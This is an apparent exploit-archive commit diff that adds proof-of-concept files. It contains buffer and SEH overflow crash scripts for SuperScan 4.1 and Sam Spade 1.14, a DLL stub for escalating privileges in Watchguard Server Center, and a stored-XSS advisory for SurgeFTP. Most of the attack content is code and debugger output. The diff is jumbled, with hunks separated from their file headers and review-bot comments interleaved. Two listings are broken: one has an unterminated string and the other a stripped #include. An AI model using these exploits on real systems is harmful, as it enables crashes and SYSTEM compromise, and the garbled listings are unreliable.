@@ -0,0 +1,25 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# Exploit Title     : SuperScan 4.1 Scan Hostname/IP Field Buffer Overflow Crash PoC +# Discovery by      : Luis Martínez +# Email : l4m5@hotmail.com +# Discovery Date    : 18/11/2015 +# Vendor Homepage   : http://www.foundstone.com +# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx +# Tested Version    : 4.1 +# Vulnerability Type    : Denial of Service (DoS) Local +# Tested on OS      : Windows XP Professional SP3 x86 es +# Steps to Produce the Crash: +# 1.- Run python code : python super_scan_4.1.py +# 2.- Open super_scan_4.1.txt and copy content to clipboard +# 3.- Open SuperScan4.1.exe +# 4.- Paste Clipboard Scan > Hostname/IP +# 5.- Clic on add button (->) +# 6.- Crashed + +buffer = "\x41" * 636 +eip = "\x42" * 4 + +f = open ("super_scan_4.1.txt", "w") +f.write(buffer + eip) +f.close() diff --git a/platforms/windows/dos/38759.py b/platforms/windows/dos/38759.py new file mode 100755 index 000000000..4f79d249d --- /dev/null +++ b/platforms/windows/dos/38759.py 
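Review bot: The output file in the PoC is opened and closed by hand (`f = open ("super_scan_4.1.txt", "w")` … `f.close()`), so an exception in `write` leaks the handle; the idiomatic form is `with open("super_scan_4.1.txt", "w") as f:` with `f.write(buffer + eip)` indented beneath it, which also drops the explicit close. `buffer` additionally shadows the Python 2 builtin of the same name; a name such as `pad` avoids the confusion. Neither point changes the crash input the script produces.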
@@ -0,0 +1,25 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# Exploit Title     : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC +# Discovery by      : Luis Martínez +# Email : l4m5@hotmail.com +# Discovery Date    : 18/11/2015 +# Vendor Homepage   : http://www.foundstone.com +# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx +# Tested Version    : 4.1 +# Vulnerability Type    : Denial of Service (DoS) Local +# Tested on OS      : Windows XP Professional SP3 x86 es +# Steps to Produce the Crash: +# 1.- Run python code : python super_scan_4.1_tools.py +# 2.- Open super_scan_4.1_tools.txt and copy content to clipboard +# 3.- Open SuperScan4.1.exe +# 4.- Paste Clipboard Tools > Hostname/IP/URL +# 5.- Clic on button -> Whois +# 6.- Crashed + +buffer = "\x41" * 280 +eip = "\x42" * 4 + +f = open ("super_scan_4.1_tools.txt", "w") +f.write(buffer + eip) +f.close() diff --git a/platforms/windows/dos/38760.py b/platforms/windows/dos/38760.py new file mode 100755 index 000000000..d371def74 --- /dev/null +++ b/platforms/windows/dos/38760.py 
@@ -0,0 +1,53 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# Exploit Title     : SuperScan 4.1 Windows Enumeration Hostname/IP/URL Field SEH Overflow Crash PoC
+# Discovery by      : Luis Martínez
+# Email : l4m5@hotmail.com
+# Discovery Date    : 18/11/2015
+# Vendor Homepage   : http://www.foundstone.com
+# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
+# Tested Version    : 4.1
+# Vulnerability Type    : Denial of Service (DoS) Local
+# Tested on OS      : Windows XP Professional SP3 x86 es
+# Steps to Produce the Crash:
+# 1.- Run python code : python super_scan_4.1_windows_enumeration.py
+# 2.- Open super_scan_4.1_windows_enumeration.txt and copy content to clipboard
+# 3.- Open SuperScan4.1.exe
+# 4.- Paste Clipboard Windows Enumeration > Hostname/IP/URL
+# 5.- Clic on button -> Enumerate
+# 6.- Crashed
+##########################################################################################
+# -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+# After the execution of POC, the SEH chain looks like this:
+# 00E3FF98 43434343
+# 42424242 *** CORRUPT ENTRY ***
+
+# And the Stack
+
+#00E3FF88 41414141 AAAA
+#00E3FF8C 41414141 AAAA
+#00E3FF90 41414141 AAAA
+#00E3FF94 41414141 AAAA
+#00E3FF98 42424242 BBBB Pointer to next SEH record
+#00E3FF9C 43434343 CCCC SE handler
+
+# And the Registers
+
+#EAX 00000001
+#ECX 00000001
+#EDX 7C91E514 ntdll.KiFastSystemCallRet
+#EBX 00A028E8
+#ESP 00E3FF58 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
+#EBP 41414141
+#ESI 00473774 SuperSca.00473774
+#EDI 00000000
+#EIP 41414141
+
+buffer = "\x41" * 328
+nseh = "\x42" * 4
+seh = "\x43" * 4
+
+f = open ("super_scan_4.1_windows_enumeration.txt", "w")
+f.write(buffer + nseh + seh)
+f.close()
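Review bot: The NOTES block lists the SEH chain as `# 00E3FF98 43434343` / `# 42424242 *** CORRUPT ENTRY ***`, while the stack annotation a few lines later puts `42424242` at `00E3FF98` (next-record pointer) and `43434343` at `00E3FF9C` (handler), which reads as a contradiction unless one knows the first listing is the debugger's chain view of record address and handler. A one-line comment such as `# (debugger SEH view: record address, handler; the next-record field is shown separately)` above the chain listing would remove that ambiguity for anyone triaging the archived entry. The register dump also shows `EBP 41414141` and `EIP 41414141`, which suggests the saved frame pointer and return address are clobbered as well as the SEH record; stating that explicitly would let a reader reconcile the dump with the "SEH Overflow" title, though the exact order of events cannot be confirmed from the listing alone.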
diff --git a/platforms/windows/dos/38761.py b/platforms/windows/dos/38761.py
new file mode 100755
index 000000000..58f5307c3
--- /dev/null
+++ b/platforms/windows/dos/38761.py
@@ -0,0 +1,22 @@
+#!/usr/bin/env python
+# Exploit Title : Sam Spade 1.14 Decode URL Buffer Overflow Crash PoC
+# Discovery by : Vivek Mahajan - c3p70r
+# Discovery Date : 19/11/2015
+# Vendor Homepage : http://samspade.org
+# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
+# Tested Version : 1.14
+# Vulnerability Type: Denial of Service / Proof Of Concept/ Memory Overwrite
+# Tested On : Windows XP SP2 ,Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64
+# Crash Point : Go to Tools > Decode URL> Enter the contents of 'spade.txt' > OK , Note: Do Remove the http://
+
+
+
+buffer = "A"*510
+
+file = open("spade.txt, 'w')
+file.write(buffer)
+file.close()
+
+
+# Follow on twitter @vik.create
+
diff --git a/platforms/windows/local/38752.c b/platforms/windows/local/38752.c
new file mode 100755
index 000000000..da327146b
--- /dev/null
+++ b/platforms/windows/local/38752.c
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/62261/info
+
+Watchguard Server Center is prone to a local privilege-escalation vulnerability.
+
+Local attackers can exploit this issue to gain SYSTEM privileges. Successful exploits will result in the complete compromise of affected computers.
+
+Watchguard Server Center 11.7.4 and 11.7.3 are vulnerable; other versions may also be affected.
+
+#include
+
+#define DLL_EXPORT __declspec(dllexport)
+
+#ifdef __cplusplus
+extern "C"
+{
+#endif
+
+void DLL_EXPORT wgpr_library_get()
+{
+ WinExec("calc",0);
+}
+
+#ifdef __cplusplus
+}
+#endif
+
diff --git a/platforms/windows/webapps/38762.txt b/platforms/windows/webapps/38762.txt
new file mode 100755
index 000000000..02b783aa5
--- /dev/null
+++ b/platforms/windows/webapps/38762.txt
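Review bot: `file = open("spade.txt, 'w')` has an unterminated string literal — the closing `"` after `spade.txt` is missing and the two quote styles are mixed — so the script stops with a SyntaxError before it writes anything, which the commit does not fix. `with open("spade.txt", "w") as fh:` followed by `    fh.write(buffer)` corrects the literal, closes the handle unconditionally and stops shadowing the builtin `file` (still a builtin on Python 2, which the unversioned shebang leaves open). The `# Crash Point` line is the only description of how the file is used; a comment stating the interpreter the author ran would help anyone verifying the archived listing.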
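Review bot: The listing is not compilable as archived: the advisory prose on the first seven lines of the hunk is not inside a comment, and the `#include` directive has lost its header name (`WinExec` is declared in `<windows.h>`, so that is presumably what was stripped). Wrapping the prose in `/* ... */` and restoring the header would make the file match its `.c` extension and keep the BID reference readable by a compiler. `WinExec("calc",0)` also discards its return value, so a failed launch is silent; `(void)WinExec("calc", 0);` at least documents that this is intentional. Note that the second `#ifdef __cplusplus` / `}` / `#endif` block closes the `extern "C"` scope opened earlier in the same hunk.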
@@ -0,0 +1,33 @@
+********************************************************************************************
+# Exploit Netwin SurgeFTP Sever Stored Cross Site Scripting Vulnerabilities
+# Date: 11/18/2015
+# Exploit Author: Un_N0n
+# Vendor: NetWin
+# Software Link: http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp
+# Version: 23d6
+# Tested on: Windows 7 x64(64bit)
+********************************************************************************************
+[Info]
+
+Surgeftp web-interface suffers with multiple Stored XSS vulnerabilities.
+
+They are:
+
+Stored XSS in 'Domain Name' field.
+
+[How to?]
+1. Open SurgeFTP web interface, Click on global option from the menu.
+2. Add a new domain, in 'Domain Name' field, add in this() payload.
+3. Save, then navigate to main page, hover mouse over 'broken image' in 'domains' section.
+
+Stored XSS in 'Mirrors'.
+
+[How to?]
+1. Open surgeftp web interface, Click on 'Mirrors' option from the menu.
+2. Click on Add Mirror, in 'Local path' & 'Remote Host' field add in this() payload.
+3. Save, then navigate to 'Mirror' page again, Hover mouse over the 'broken image' in 'local path' & 'remote host' field.
+
+Previously, Somebody else reported Stored XSS vulnerabilities in SurgeFTP.
+Vendor tried to fix the previously reported XSS vulnerabilities by blacklisting only the payload
+which is well not a good practice since i have triggered the same vulnerability by just entering different XSS payload,
+therefore White-listing is the correct solution.